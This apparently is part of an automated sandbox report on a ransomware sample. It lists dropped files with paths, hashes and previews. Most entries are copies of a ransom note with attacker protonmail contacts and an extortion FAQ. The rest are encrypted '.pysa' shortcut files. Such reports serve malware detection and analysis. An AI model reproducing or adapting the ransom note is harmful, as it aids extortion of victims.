                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\AppData\Local\Microsoft\Windows\INetCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):22386
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:384:epEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEB:9
                  MD5:05388007C4083607204EE6ED76A05084
                  SHA1:DB4F763C237EA6749F3A204F6B5CC7ABFD9A0411
                  SHA-256:C683024A96BE04EBA3207EFC41C62A2C6DEFDE47C044FB8A162EC9AC7A119060
                  SHA-512:FD683D9179E043915A30C71D90B0C0B4EB33B00D74871664792BC082BD1F5701A1CED2785A4CE22A60134422E7587C383E7815F4EB712310AF204F0D295BB71A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\AppData\Local\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):25584
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:384:epEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEr:3
                  MD5:BC8525A2688651EC274A6D322DD3E7FC
                  SHA1:23890076CFE4EA74DABC1F9908EEC2C5B2A3783C
                  SHA-256:31B80935D45D34D58CED055ED1E15B959EEE5C73EC28D6A92BA41989116F292A
                  SHA-512:41982FC816D72DDEEFE918F327754BEA7D08745CB6479127767E5EAF9EE2A9B0EA39473CD11D82464F39BC5B358E3D72EBC0C152DDD078E7B7F9A52BAB9871F9
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\AppData\Local\Temp\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):25584
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:384:epEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEr:3
                  MD5:BC8525A2688651EC274A6D322DD3E7FC
                  SHA1:23890076CFE4EA74DABC1F9908EEC2C5B2A3783C
                  SHA-256:31B80935D45D34D58CED055ED1E15B959EEE5C73EC28D6A92BA41989116F292A
                  SHA-512:41982FC816D72DDEEFE918F327754BEA7D08745CB6479127767E5EAF9EE2A9B0EA39473CD11D82464F39BC5B358E3D72EBC0C152DDD078E7B7F9A52BAB9871F9
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\AppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.047266577552996
                  Encrypted:false
                  SSDEEP:48:ZtmUvjC0emBo4TpHVhz1fkjnTQVla64fKZmO0YsThuyLY3aEf0C9rD4FcR4s:ZMipBoUYcVlaJfKZmO0HhpY3f0CVMFW3
                  MD5:761C6EF65F2D273D8B5FCD0BC045A678
                  SHA1:C9CC0C263C853765A0022E7C02F9501B67015253
                  SHA-256:ABA15FB54BC7F6B3E845449F788257B9605D8302B201D80CC8B1BCD949D5A336
                  SHA-512:19F3041F5082FFA92F7FACBA02E08E37B4E67F9D78720259802CDA11F8EDC71127DC919164FE5DB2BAFD83CA063F3874F1B3A9E62CB45682C375FBBD83D1CA9D
                  Malicious:false
                  Preview: .v..uEL..C.QI).TL.A.....f....D..6A..L0.N...F...;.rf8...ib.............\..z*.y..+.Yo.......2+8....3C.#..+t..K.....)Gq~.}.7...jJ.xD........."..........QiR|{.]....m..<..#.....r.U..kPQ...EN..Q..."..................p6J.....Ln..}<X.5t...GAc.Ep5.3.R.yv.S.25...........St.K5.[.PPo.....L."...g.mrN.....)+.@..R%E.y%.!Y...p..."...,.a.V....+....g..33(gh.E...L.N..|.9.d9.OxPJ..x7V.W..|..61C.PH..W...~z.m.....jF.......t.w1.......q..M.[^.^st.7...^....7.D...y.5.....L..k..NIQ.;.9.-.X..R..$....G..\..........l7..KE..f{*..pn...a.s 2.|nc.,...@.....B..O..;.M... ;..\....g...^..../....E.../.......r.....'d`.[3..H.....2....^Xm...k.<d.....Q.ea...0......\....'.....L...f".%.p...`...G.|-...=.....j.M.....h.....n..M.\..g.G<qb..p.4`|....+..a.i.(.....J....K...Ld.../..."x....;........q...v_.i.m9wh..0Y.r.!..(..FU.Qm0.>....Bx.....6.....y...4...Z..<...qj^u..@.:j=..d.x..880.a....&.*..zz.Ek>.3^B.MqxR.N..D&x..`.7..3|.:a..k..:CO[......9......zo.:...J.]....B2c .?..z.{ib. .7w.=.X..
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Magnify.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.047698637791427
                  Encrypted:false
                  SSDEEP:48:j9cJvRe6mcHOM2WsaqnfdsgOrEalRlQmPrWDHiCKhe3EAvBuE/Hy/iQY/5RnA1Ks:JcJvRe6mMT1sTBQxdV6biCKhe3EAoE/W
                  MD5:4C7055F2F52394A64F7ADC69B020F248
                  SHA1:2BB081F2CBE76AA861C793D3D2DD4BABF6497DFE
                  SHA-256:4E6E8AE697F2E1F84F6205E75EA68DAD24F3B89067154FF13FDCAA7E4E85F7DE
                  SHA-512:4DFFDDD30CDCBFC5A5AD8BEC7481D0A2D29BB64C480B4153F07DCC69D07A070AEDD4961F46A90CC91B6F872C95173FF6E94EA7D7BF7EB28C342494EFBA80B210
                  Malicious:false
                  Preview: .....".;..~p.a..E.$!=.+N.....|..\...D.....s.f.b..LG...".!+....9F.......&K...$.V`.~3...D....".....j......l.P..$.d;].VJ....K......k.......z.....s.Q..V..c>u...Q=.TY..3.X....1.K......:.D..fc..$.g..ON.E.$.C*Db....w..p.u..........kc..e@.H^/...O.3>L+o~...*....:...(.....2.....iy!....Q..y..7..@.R)s..S.....#SF...}$.&...2.........N......AZ.8..f...0M.58hx. $bAA.............s......e(.....U.J....M!.V....\..c.,:N..Y.'r6.s...J...db..w@..).Z.s.zv..^'.jC......./h..4..X..)....y.. . ...n.y...`.|....[.>2../..>0...WQ..u.....e....n..{b.f<..\..~....M.,.P+..i"8..L...3(T{5g..F{..x.Bz......d}.fy.|.X...........L.$B....U.r1{Fz.M.=...9.E...L.U.7...f..;.Pu*'T.&p6.y_..h.x.../..O.7...=.g{.wC.....]Q.j..4....D*...bo.'.>.U.....]R.=t...!5....#..\....z.M...P\..N..4.A.....Q.z8.]...1...].}.6.................a..e...2..K.AM.......K..H..d/.x..g[!..QXP.u(.2.......g6`.n:&.L(]..6..k._...X.Q^.s.S|....&U,l..5`L......G#...f(. fg...c.A.O....81._.8G/..."Gc.g,.k.6..V..}....8..n
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Narrator.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.049264424966879
                  Encrypted:false
                  SSDEEP:48:dT5pBgKu2niR95jvgaVmbxzVDrvCshchmmgrev8o1psCWxc1P9jgvzqdc2NuQcTE:vpmXGiZvZobFJDchT5v8cbHjq26bQm+P
                  MD5:98D5232F903FF6F7E8C625CED5E8A55D
                  SHA1:90812CFAD2D18803F25F3209AA8342FC27FE2165
                  SHA-256:5B186DF794856ED168365B5EE4EF4DE15896D6A880BACE67EC6707A83FDEDD54
                  SHA-512:A3970C8CE52620253C37C65333685CC4CEAEAB1ECCD78D5727AB433F167F175BCF66407E1C6701019129CCFE84A743225727F313699A82CD5D17ED0422ADA303
                  Malicious:false
                  Preview: B...lO..&S...joA...^.9..9'...GB@.y"VxN../~.kv.^.=.U...H....!#..E5...V!...x..$.>..?......R.y....J6.)G....}.p....c(...D&.....)W..A....g.u....&..ex...n....1m|l..]g..H..M-ZP@O[8.N.@......K.ad....G...2....c......G-.+.....K4.^.0.....*].m.v...;..Fx.1..*..%x.v..b;..GV..qS...^+...{.w.c..0_..'......r..R..r.]T..a....q....S.:.....#...g..t....@..x.#.t........,...y1.$.oqTz.N.O..-M.0p~....d6..3..#.+w.78..->..2...k..2..E.q...)....".B.E.5.K...}..A.(m....K..Dw..:...G...r.C..=...x..FG...hEH...v...K.....M..?.w.q$...H9...."/..Z.A.pP..5xT...P.....S.J....pN... xo.(...Ao......P.....e......Qem%.BP.m.....:.U..J%C..G..!7..J.h.~..PeX.4m....o..0K...'..y).Z...z.t..4.t.~..-_|2...^.(...]5"}.lADc......b....v.........ak/.)..*x.X.W...5...........{..E.W.|.......].#...L....m.<p<.%.<..V\Lr.........m2b.rC{.O...??.R.......G...`lP.~...z......?.|.b[`..].K..+..'%.4(!.xC.....SE....Y...1.5yOX'a.j6z....OB.%.Pj.W.....j..a..f.=...v3c._....N>O.....V.....G.K...f.YD.2..:.D.......P+%$......
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.02846309191236
                  Encrypted:false
                  SSDEEP:48:ghOaLLnq87waEkxM2zR3YBWWv1mN7TCQzAgpWCAT2jrt0tVvdoNZqpVC9u:ghLq87wSNqBWWvkjsgpe4vS
                  MD5:94D774F49FC40DBCDBC7E72B77471A37
                  SHA1:30AF7FB29899C8B1F302F25A391822E519157E19
                  SHA-256:45F3FE5BCB9D935FDC3355EF3D24447DEC8723AD4F03403AA8E6042AA529B2A5
                  SHA-512:BF66E75EC07A189C1AD2DEBED8C5DA39D34684BA7475BC4A00C5B963A6058759833071A89C729F9CA16E647A5A540B976A8D2E461A129C9DC238712A03743370
                  Malicious:false
                  Preview: I....+....t.|X.....[.A.7.....+.....VON_.....k.Z7.`..Qs.F...4...U.....A0.....r...=E..n..`..#...m...92......`..2.h..O>.5.[..1~jG........B..FY'....>D.|.....w|ZN....Pi .>,...z........)...........%g.W.../oXo....z..&.42y$}y.}.KJ.X...T..r...m.F.../.N.>...D......`u...^.D.9.j..7`....X...t.....9-.....?.s....v...}..<.[.l..,:.._.S.DGm.....1.a`.S%....*.* Sr....6e#.mT..so..i...W;.]..U.$...{3~1u....i.>.,.R..`...8.d..~..XS36.y3p\*M.*Z9.M...V:..g.W.......#J.%...mwd.._....S........"a...("=.k...V@..@^n...V9E.O...1.:6J.P.KCy...6.o...?...l....Q..4.....*.w...E.6..e....(.F.vF7..G....|1.y.N...b....P.../w...../.+..7u..I..c......=..{..%&.;[>N.a...f6A..G..Moo.?..J..{.%[K.(u8..`.1...1..:j5#... ...4g.0.ZO..?.1.M.u.N.d.....z...S...ml..9.... .&.{.<...K.#.<?.o..R.~.hW....]|k....8.....%.I...*.....6..a5.....f4|.n.....G.]U.%...O.D...O.Jz...f#U0a'..f$..|>.Uu...%P...O|W'Ts..'....KF.V....O[.(b..f...f...E.*..R0.#oV3...29.........R.....a.?....(M..zZ..A.$..}.:*.]....q[P..
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.0595510017070975
                  Encrypted:false
                  SSDEEP:48:r9ra5YI8dFCjyvkHbGOKUY4EmTsmIFzeQDR8dzv2vz8VlsNCxHDUKT0xZGo11+vt:4YPdFGbG5zzmT2FzeLuvl8xJTasvt
                  MD5:4AB75267700963C62A1A05136B492A70
                  SHA1:B637E0C0DE0508128C2D0B8B40314E2BC173525B
                  SHA-256:2A90011B80DA1571F6788C1FF581FD72B43B051C54D30E0AC8926D970CA1E126
                  SHA-512:F23030BD8946C5E11535F181F613221953D74B9B31B39E5FD5713B7D4EC781A07895873B250BCAFE3EDD8DCCD543BD91166389F10D7876E717FD5C92E552F8BB
                  Malicious:false
                  Preview: %..;.....e:..H.p..[..pcq.~./'.'"z.'Z..zE..{.....v...S....uv.X..[.v_.q...P.A..W'.Tb.(K.&.99_R.I...O..1.5..$7.kY..t...q..#?.V4.w.6.)...k...."8.<G_-c.V}`...X.....Ki..t..(B..q...$.Jg....:.H..meQx...i........B.O..B.o\(..3.H..N..d.1n.....F\..KG.=e.C...n..UG.j.N.&.d.`....ebK.c..z1H.....^......}Bo........&I....cum.......=.;,n..c].M..?.H..c.lw.F..q.E...\<.v.Gq..$..WF..............`.g.8.x.;..G....,.D......h....6.WT[F.s..[.U.*ZA~....A....=....7..)".jZ.|......1......y...;H.vG.IL..t.v.'....f.Zw....u.c........[...(;.....*d..8*.............f$B:.T..)P..`......s.{......u.......G.(.(5.l....2F..o.s...KG(...tO......]4..a..~..jd..SE..%~:K....._m%.._.....n.._..../W0.J.yym.@.kV..l..4.3...G8-..4...7.N................l..)oy$.8.\..JmJ..2....<.....r.U.....:w3.-@..U.7K......Gzqt.j.....c}d.._.Kd.V...@3..oG.G..4u..S...-.S.M.<..c...S.i.?L.[...`....QYN.m....i."......QrB..Z....D....#..;.K.p..@-.....`._.V.. .<..8..8.2...\..!.lC.PB=..(.Q.o...j...h.....;5....
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
